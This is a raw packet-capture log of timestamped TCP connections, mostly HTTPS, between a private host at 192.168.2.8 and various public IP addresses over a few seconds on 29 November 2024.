Nov 29, 2024 12:28:05.580996037 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.581023932 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.581037045 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.623999119 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:05.624032021 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:05.624097109 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:05.624121904 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:05.624145985 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:05.624157906 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:05.636203051 CET	49801	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:05.636264086 CET	443	49801	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:05.636341095 CET	49801	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:05.636522055 CET	49801	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:05.636534929 CET	443	49801	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:05.647715092 CET	443	49794	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.647737026 CET	443	49794	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.647797108 CET	49794	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.647810936 CET	443	49794	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.647845984 CET	49794	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.647869110 CET	49794	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.660803080 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:05.660825014 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:05.660886049 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:05.660907030 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:05.660958052 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:05.663840055 CET	443	49794	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.663902998 CET	49794	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.663912058 CET	443	49794	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.663924932 CET	443	49794	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.664033890 CET	49794	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.664295912 CET	49794	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.664314032 CET	443	49794	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.712163925 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.712191105 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.712244987 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.712265015 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.712290049 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.712306023 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.751204967 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.751235962 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.751276970 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.751297951 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.751343012 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.751343012 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.769001961 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.769082069 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.769098997 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.769129038 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.769145012 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.769192934 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.788995981 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.789060116 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.789069891 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.789092064 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.789108992 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.789182901 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.799621105 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:05.799649954 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:05.799693108 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:05.799705982 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:05.799750090 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:05.799760103 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:05.827351093 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:05.827380896 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:05.827430010 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:05.827460051 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:05.827486992 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:05.827500105 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:05.850461960 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:05.850480080 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:05.850533009 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:05.850542068 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:05.850575924 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:05.915250063 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.915275097 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.915309906 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.915326118 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.915359974 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.915373087 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.926485062 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:05.926503897 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:05.926557064 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:05.926567078 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:05.926589966 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:05.926605940 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:05.932085991 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.932105064 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.932156086 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.932163954 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.932209969 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.935658932 CET	49802	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.935688019 CET	443	49802	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.935743093 CET	49802	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.936080933 CET	49802	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:05.936096907 CET	443	49802	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:05.946629047 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.946650982 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.946696997 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.946703911 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.946731091 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.946746111 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.963577032 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.963596106 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.963643074 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.963648081 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.963690042 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.979319096 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.979338884 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.979541063 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.979542017 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.979553938 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.979638100 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.996630907 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.996653080 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.996701956 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:05.996726990 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:05.996927023 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:06.019337893 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:06.019388914 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:06.019407034 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:06.019418001 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:06.019447088 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:06.019453049 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:06.019476891 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:06.019505978 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:06.019736052 CET	49796	443	192.168.2.8	40.118.171.167
Nov 29, 2024 12:28:06.019748926 CET	443	49796	40.118.171.167	192.168.2.8
Nov 29, 2024 12:28:06.046937943 CET	80	49703	84.201.211.24	192.168.2.8
Nov 29, 2024 12:28:06.047069073 CET	49703	80	192.168.2.8	84.201.211.24
Nov 29, 2024 12:28:06.047116041 CET	49703	80	192.168.2.8	84.201.211.24
Nov 29, 2024 12:28:06.113442898 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:06.113472939 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:06.113514900 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:06.113531113 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:06.113563061 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:06.113576889 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:06.126158953 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:06.126179934 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:06.126239061 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:06.126250029 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:06.126293898 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:06.138586998 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:06.138606071 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:06.138664961 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:06.138670921 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:06.138865948 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:06.149480104 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:06.149497032 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:06.149553061 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:06.149559975 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:06.149705887 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:06.162866116 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:06.162888050 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:06.162944078 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:06.162950039 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:06.163095951 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:06.167062998 CET	80	49703	84.201.211.24	192.168.2.8
Nov 29, 2024 12:28:06.171763897 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:06.171802998 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:06.171837091 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:06.171842098 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:06.171866894 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:06.171883106 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:06.171904087 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:06.172247887 CET	49793	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:28:06.172260046 CET	443	49793	13.107.246.63	192.168.2.8
Nov 29, 2024 12:28:06.534074068 CET	443	49800	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.539113998 CET	49800	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:06.539145947 CET	443	49800	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.539737940 CET	443	49800	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.540796995 CET	49800	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:06.540895939 CET	443	49800	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.581418991 CET	49800	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:06.619294882 CET	49803	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:06.619348049 CET	443	49803	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:06.619424105 CET	49803	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:06.619560003 CET	49804	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:06.619591951 CET	443	49804	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:06.619664907 CET	49804	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:06.619755983 CET	49805	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:06.619787931 CET	443	49805	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:06.619852066 CET	49805	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:06.619918108 CET	49806	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:06.619926929 CET	443	49806	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:06.620078087 CET	49806	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:06.620081902 CET	49807	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:06.620090961 CET	443	49807	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:06.620156050 CET	49807	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:06.620269060 CET	49808	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:06.620282888 CET	443	49808	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:06.620373964 CET	49808	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:06.620623112 CET	49803	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:06.620634079 CET	443	49803	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:06.621014118 CET	49804	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:06.621033907 CET	443	49804	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:06.621298075 CET	49805	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:06.621314049 CET	443	49805	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:06.621468067 CET	49806	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:06.621481895 CET	443	49806	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:06.621627092 CET	49807	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:06.621643066 CET	443	49807	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:06.621731043 CET	49808	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:06.621741056 CET	443	49808	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:06.939965010 CET	443	49801	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.941278934 CET	49801	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:06.941327095 CET	443	49801	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.941673994 CET	443	49801	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.942079067 CET	49801	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:06.942224026 CET	443	49801	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.988440990 CET	49801	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:07.030297995 CET	443	49731	23.206.229.226	192.168.2.8
Nov 29, 2024 12:28:07.030368090 CET	49731	443	192.168.2.8	23.206.229.226
Nov 29, 2024 12:28:07.399282932 CET	49778	443	192.168.2.8	18.165.220.66
Nov 29, 2024 12:28:07.408628941 CET	443	49802	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:07.408739090 CET	49802	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:07.410105944 CET	49802	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:07.410116911 CET	443	49802	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:07.432436943 CET	49802	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:07.432445049 CET	443	49802	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:07.432531118 CET	49802	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:07.432549000 CET	443	49802	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:07.432555914 CET	49802	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:07.432568073 CET	443	49802	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:07.432619095 CET	49802	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:07.432625055 CET	443	49802	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:07.432693005 CET	49802	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:07.432706118 CET	443	49802	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:07.432723999 CET	49802	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:07.432734013 CET	443	49802	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:07.432831049 CET	49802	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:07.432859898 CET	443	49802	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:07.432864904 CET	49802	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:07.432878971 CET	443	49802	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:07.432888031 CET	49802	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:07.432894945 CET	443	49802	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:07.432950974 CET	49802	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:07.432962894 CET	443	49802	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:07.432984114 CET	49802	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:07.432995081 CET	443	49802	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:07.433006048 CET	49802	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:07.433008909 CET	443	49802	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:07.443322897 CET	443	49778	18.165.220.66	192.168.2.8
Nov 29, 2024 12:28:07.674736977 CET	49809	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:07.674774885 CET	443	49809	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:07.674875021 CET	49809	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:07.675415039 CET	49809	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:07.675429106 CET	443	49809	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:07.749393940 CET	49810	443	192.168.2.8	23.96.180.189
Nov 29, 2024 12:28:07.749419928 CET	443	49810	23.96.180.189	192.168.2.8
Nov 29, 2024 12:28:07.749507904 CET	49810	443	192.168.2.8	23.96.180.189
Nov 29, 2024 12:28:07.750623941 CET	49810	443	192.168.2.8	23.96.180.189
Nov 29, 2024 12:28:07.750636101 CET	443	49810	23.96.180.189	192.168.2.8
Nov 29, 2024 12:28:07.910840988 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:07.910913944 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:07.910921097 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:07.910970926 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:07.949461937 CET	49797	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:07.949500084 CET	443	49797	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:07.977824926 CET	443	49778	18.165.220.66	192.168.2.8
Nov 29, 2024 12:28:07.978014946 CET	443	49778	18.165.220.66	192.168.2.8
Nov 29, 2024 12:28:07.978070974 CET	49778	443	192.168.2.8	18.165.220.66
Nov 29, 2024 12:28:08.008049011 CET	49778	443	192.168.2.8	18.165.220.66
Nov 29, 2024 12:28:08.008081913 CET	443	49778	18.165.220.66	192.168.2.8
Nov 29, 2024 12:28:08.137079954 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:08.137120962 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:08.137360096 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:08.137623072 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:08.137629032 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:08.286602020 CET	49812	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:08.286643982 CET	443	49812	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:08.286747932 CET	49813	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:08.286782980 CET	49812	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:08.286788940 CET	443	49813	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:08.286840916 CET	49813	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:08.287091970 CET	49814	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:08.287108898 CET	443	49814	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:08.287192106 CET	49814	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:08.287338972 CET	49815	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:08.287348032 CET	443	49815	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:08.287396908 CET	49815	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:08.287533998 CET	49816	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:08.287560940 CET	443	49816	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:08.287609100 CET	49816	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:08.287816048 CET	49812	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:08.287832022 CET	443	49812	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:08.287971020 CET	49813	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:08.288022041 CET	443	49813	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:08.288062096 CET	49814	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:08.288074970 CET	443	49814	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:08.288160086 CET	49815	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:08.288170099 CET	443	49815	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:08.288249969 CET	49816	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:08.288264036 CET	443	49816	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:08.335901976 CET	443	49806	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.336250067 CET	49806	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.336281061 CET	443	49806	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.336483002 CET	443	49804	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.336730003 CET	49804	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.336743116 CET	443	49804	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.337085962 CET	443	49804	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.337331057 CET	443	49806	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.337392092 CET	49806	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.337483883 CET	49804	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.337548971 CET	443	49804	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.337882042 CET	49806	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.337945938 CET	443	49806	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.338073015 CET	49804	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.338135958 CET	49806	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.338143110 CET	443	49806	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.348989010 CET	49817	443	192.168.2.8	108.139.47.92
Nov 29, 2024 12:28:08.349026918 CET	443	49817	108.139.47.92	192.168.2.8
Nov 29, 2024 12:28:08.349179983 CET	49817	443	192.168.2.8	108.139.47.92
Nov 29, 2024 12:28:08.349304914 CET	49817	443	192.168.2.8	108.139.47.92
Nov 29, 2024 12:28:08.349313021 CET	443	49817	108.139.47.92	192.168.2.8
Nov 29, 2024 12:28:08.379031897 CET	49806	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.383325100 CET	443	49804	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.404860020 CET	443	49808	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.405915976 CET	443	49805	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.405936003 CET	443	49807	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.406523943 CET	443	49803	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.407027006 CET	49808	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.407054901 CET	443	49808	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.407454014 CET	49807	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.407473087 CET	443	49807	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.407567978 CET	49805	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.407577038 CET	443	49805	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.407675982 CET	49803	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.407687902 CET	443	49803	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.408097029 CET	443	49803	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.408145905 CET	443	49808	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.408204079 CET	49808	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.408528090 CET	443	49807	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.408588886 CET	49807	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.408615112 CET	443	49805	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.408673048 CET	49805	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.410630941 CET	49808	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.410726070 CET	443	49808	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.411144018 CET	49803	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:08.411253929 CET	443	49803	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:08.411423922 CET	49805	443	192.168.2.8	13.107.246.40
